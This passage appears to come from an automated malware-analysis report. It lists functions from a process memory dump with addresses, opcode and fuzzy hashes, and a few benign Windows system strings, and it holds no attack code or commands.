                                                    • Instruction Fuzzy Hash: A051F471D00259CFDB31CF64C845BAEBBB0BF04320F2081AAE95DAB281D7745D45EB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F3B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3B9A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                                    • Instruction ID: b0944d62345824871873cd402ae3b710976a7335a8accb3887a7cec10b5e88eb
                                                    • Opcode Fuzzy Hash: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                                    • Instruction Fuzzy Hash: 7B515B71A08741CFC720DF29C490A2ABBE5FB88720F24896EFA8587355D735EC44DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F4FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F8BE0F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                                    • Instruction ID: 2ab7c7b27b06b0dc586f3e8fbbd4084c20ffb5c37e98aa6cf287533a899efcda
                                                    • Opcode Fuzzy Hash: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                                    • Instruction Fuzzy Hash: 92A10632F0060A9FDB21DF64C890BAABBA4AF44720F144579ED4ADB681DB34DD09EB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F403E2, Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    • Opcode ID: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
                                                    • Instruction ID: 9e3edee220b784d99cd026d8322c951a30883c4b6bea57e4b8c2cb9f73793c44
                                                    • Opcode Fuzzy Hash: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
                                                    • Instruction Fuzzy Hash: B6910A32E042159FEB31EB68CC45BAD7BA4EB01734F150265FE50A72E1DB78AD40EB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F4F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 4e2570315d377aa287a5bee40a52bcdf1806bba53ba41f48a1c572a9b0bb5c98
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: 5E51BF715047109FC321DF18C841A6BBBF8FF88710F00892DFA9597690E7B8E914DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F93540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
                                                    • Instruction ID: 2286061e1d5f07e8a9a761a7e90f4c8915a94a9eab28eed739516515c3bc2977
                                                    • Opcode Fuzzy Hash: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
                                                    • Instruction Fuzzy Hash: 3A4122F2D0052CABEF21DA50CC85FAEB77CAB44714F0045A5EA09AB241DB749F889F95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F53D43, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    • Opcode ID: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
                                                    • Instruction ID: fc69e3c0ea3b4196ca8d1a3ae6f082c9f72d5e48440e1f0ee55a7b2b6e8ec8dd
                                                    • Opcode Fuzzy Hash: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
                                                    • Instruction Fuzzy Hash: 05310032A00628DBC7249F2DC842A7BBBF0EF857A1B15806AEA45CB350E730DD44E790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F93884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
                                                    • Instruction ID: bd83452e3b2f531e2fd87419231339ff807ba1b4ed9784071f65c20d50264423
                                                    • Opcode Fuzzy Hash: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
                                                    • Instruction Fuzzy Hash: 75310372D00529AFEF15DB58C946F7BB775EB80B20F114129E904A7280D770AF04E7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F4D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
                                                    • Instruction ID: c8e59de5dbe59aa3aa0e0cae2ed00b00fc8aad45acc85e35ba53d7f0006b7bb4
                                                    • Opcode Fuzzy Hash: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
                                                    • Instruction Fuzzy Hash: A1318FB25083059FD321DF28C981A6BBFE8EB85764F50092EF99483250D639DD08EB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F21B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 0af95d40507764debde661119b3f92cfe48350bb1b3f9b015bc2cd8b1a5ae24e
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 5F21D37B980638ABCB21AA55A840F9FB7A9BB91760F254426FD048B200D634DC00B7A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Critical error detected %lx, xrefs: 00FC8E21
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
                                                    • Instruction ID: 2e96797d1375fd6be4e8857e06ea6c2703109438449271233b686dc97212f72b
                                                    • Opcode Fuzzy Hash: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
                                                    • Instruction Fuzzy Hash: 77116D71E14349DBDF24CFE58A06BECBBB0BB04755F20425DE5296B292C7784A02EF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FE5BA5, Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
                                                    • Instruction ID: 847d984e52f32e927edbf9e607ae459fde94f452a3fb8ff4aa4d749ab8d1fc07
                                                    • Opcode Fuzzy Hash: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
                                                    • Instruction Fuzzy Hash: DF427771E00269CFDB20CF69C880BA9B7B1FF59714F1481AAE94DEB242D7349A85DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F2D5E0, Relevance: .4, Instructions: 353COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
                                                    • Instruction ID: 54f23e9b88f516ffcb0ca8f105d68e73b4d89e0d8f74cd15aabb2a6eafec3eb4
                                                    • Opcode Fuzzy Hash: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
                                                    • Instruction Fuzzy Hash: 70E1D331E00369CFDB35CF14DC84BA9B7B1BF46324F1441AAE9499B291D738AD81EB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F2849B, Relevance: .3, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
                                                    • Instruction ID: 632de059874185b27341087e7249e558dea8cc3e2fa582687d5ff88b9caa8dc1
                                                    • Opcode Fuzzy Hash: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
                                                    • Instruction Fuzzy Hash: 5EB1BF70E05219DFDB24DFD8D880AADBBB5FF48310F20812AE505AB345DB74AD46EB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F4513A, Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c116c582a42be110a7790fbc4dda76b6d8863dc2751ab8ef822f13006755eef
                                                    • Instruction ID: 327f02c4f4695fdfa3223511c10cfa76db2e6d6653cfe7d3aba9dc27021a29fa
                                                    • Opcode Fuzzy Hash: 2c116c582a42be110a7790fbc4dda76b6d8863dc2751ab8ef822f13006755eef
                                                    • Instruction Fuzzy Hash: F6C15275A083808FD354CF28C480A5AFBF1BF88714F148A6EF9998B352D774E945DB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FAB8D0, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
                                                    • Instruction ID: 477d45e909d8044e4df0374e6199cb83e046797a737db82010702318edf1b4b1
                                                    • Opcode Fuzzy Hash: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
                                                    • Instruction Fuzzy Hash: 327130B2600B01EFD7328F24CC41F56BBE5EF46720F244528EA55872E2DB79E940EB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F152A5, Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
                                                    • Instruction ID: 223e9581866cfb8bb376287e37635fb5f3e19ef5f20502c4978696788465a1d6
                                                    • Opcode Fuzzy Hash: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
                                                    • Instruction Fuzzy Hash: 0251BB72204781EBD7219F64C841B66BBA4FF90B20F14491EF49987652EB78E844E792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F42AE4, Relevance: .2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
                                                    • Instruction ID: 44c352a8c33c668662a045bd912b2f69254b6f9ed5a225237cb9cb31689c31d4
                                                    • Opcode Fuzzy Hash: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
                                                    • Instruction Fuzzy Hash: 2351BE76E005158FCB54DF1CC8809BDBBB2FBC8700B55846AFC869B315D735AA91EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FE740D, Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: e9382f962d6118a7c9eaf8ce229dd29d7d9607a4f22adc04241c16173f8c6d3c
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: F851AA71A00746EFCB15DF15C881A92BBB5FF45314F18C0BAE9089F212E371E946DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F44D3B, Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
                                                    • Instruction ID: 41399f129f5b944dbe635d5e90913736807b869e80d446c88d427692caecf585
                                                    • Opcode Fuzzy Hash: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
                                                    • Instruction Fuzzy Hash: 0F41B371A407189FEB31DF14CC81FAABBA9FB45720F004099ED45A7281D775ED44EB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F28A0A, Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
                                                    • Instruction ID: e9dfb4a1c9b447accd59b412055e17c8be5a365a6faca50a011f291d3d8711a6
                                                    • Opcode Fuzzy Hash: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
                                                    • Instruction Fuzzy Hash: FC418FB1A0123C9BDB24CF55DC88BA9B7F4FB94350F1041EAE80997242EB749E81DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F969A6, Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
                                                    • Instruction ID: e89f246d6051937002fae598fd246827c85f380c49f9a611ddcb2cd10e73d691
                                                    • Opcode Fuzzy Hash: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
                                                    • Instruction Fuzzy Hash: FD4188B1D00208AFEB25DFA5D941BAEBBF4FF48714F14812AE914A7241DB789905DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F97016, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
                                                    • Instruction ID: 32ec2d8882ab7a87af8b5101395741a8f8e0409f7d23449d79b54841ac838102
                                                    • Opcode Fuzzy Hash: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
                                                    • Instruction Fuzzy Hash: 6A31E472A087419BD724EF28CC41A6BB3E5BFC8710F044A29F89587691E734ED04DBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F3C182, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: 660fdadb7ac4459ac50b35ae4ea492d521ba870fa3fae698eff1de6ca4d629f0
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: F5313972A01546BED704FBB4CC91BEAF764BF46320F14416AE41C57202DB38AA09F7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F461A0, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
                                                    • Instruction ID: 75b1ecd8475590f77975967848166565aaf6e745cd36c60b57d7820bf5033ae2
                                                    • Opcode Fuzzy Hash: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
                                                    • Instruction Fuzzy Hash: 79317C72A097018FD324EF19C800B66BBE4FB88B10F15496DE998D7391E7B0DD04EB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F1AA16, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
                                                    • Instruction ID: 4c79e862a470abbf72e13a3aab58d01d23b0bfd549e6a71687eeea4bcf97b409
                                                    • Opcode Fuzzy Hash: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
                                                    • Instruction Fuzzy Hash: 3231E571A00619EBCB11EF64CD42ABFB7B9EF04710F10406AF905E7141E779AD51EBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F58EC7, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
                                                    • Instruction ID: 8970dbc29e48e5cc78fbbe7d9766a1d2c68ae0ef3e7024a104af572118079ffa
                                                    • Opcode Fuzzy Hash: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
                                                    • Instruction Fuzzy Hash: B54190B1D003189FDB24CFAAD981AADFBF4FB48710F5081AEE549A7240EB745A85DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F4BC2C, Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
                                                    • Instruction ID: 140b36c70c1f537dd92841fd936104875160d2af6a9c61bd1e3028d90a446e0c
                                                    • Opcode Fuzzy Hash: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
                                                    • Instruction Fuzzy Hash: E731F236A006159BDB22DF58D8C07A677B5FF18321F1440B9ED84DB206E77ADD45EB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F41DB5, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: 21c117a70d41fa8ecb8204f1caa4df301d9eb29a55afb94dc3e816c72bfa1e96
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: 9A216D76A00529ABD721DF59CC80EABBFB9FF85750F114055ED0597210D634AE41E7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F19100, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
                                                    • Instruction ID: 0c5b514350409901730cf755adc2f79fdd79be3984879ea63d5ec3944fc39930
                                                    • Opcode Fuzzy Hash: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
                                                    • Instruction Fuzzy Hash: 7F31C571E09286EFDB25DB68C8587ECB7B1BB48320F15815AD40477241C3B5AEC0EB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F30050, Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
                                                    • Instruction ID: f8b3f28a09a01cf2e7fc21985fa43bb9c50842b730d2b7d68bd0146ee3398b4d
                                                    • Opcode Fuzzy Hash: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
                                                    • Instruction Fuzzy Hash: D131BF71601B04CFD725CF28C850B96B3E5FF88724F14856EE49A87650DB75AC01EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F96C0A, Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                                    • Instruction ID: 5a09a6607ca5e56f0a4cf4323bd3c23758fd9063456c52a36113e86f24b335bc
                                                    • Opcode Fuzzy Hash: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                                    • Instruction Fuzzy Hash: 6F219AB1A00644ABDB26DB68D881F2AB7A8FF48710F1400A9F944D7791D639ED10DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F590AF, Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 001e2fcf472506be4196c74b17f99b29d5a07dd41d24c80b19c17302ce9534a0
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: 41218072A00615EFDB21DF69C845A6AF7F8EB54321F14887AEA49A7240D370ED04EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F43B7A, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                                    • Instruction ID: cb65123d6d979710e6341970e3f466c7a03433defe3880ce30584a8a9a668eb7
                                                    • Opcode Fuzzy Hash: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                                    • Instruction Fuzzy Hash: 5A21B072A00108AFCB11DF58CD81F5ABBBDFB40708F150069EA08AB251D775AE05DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F96CF0, Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
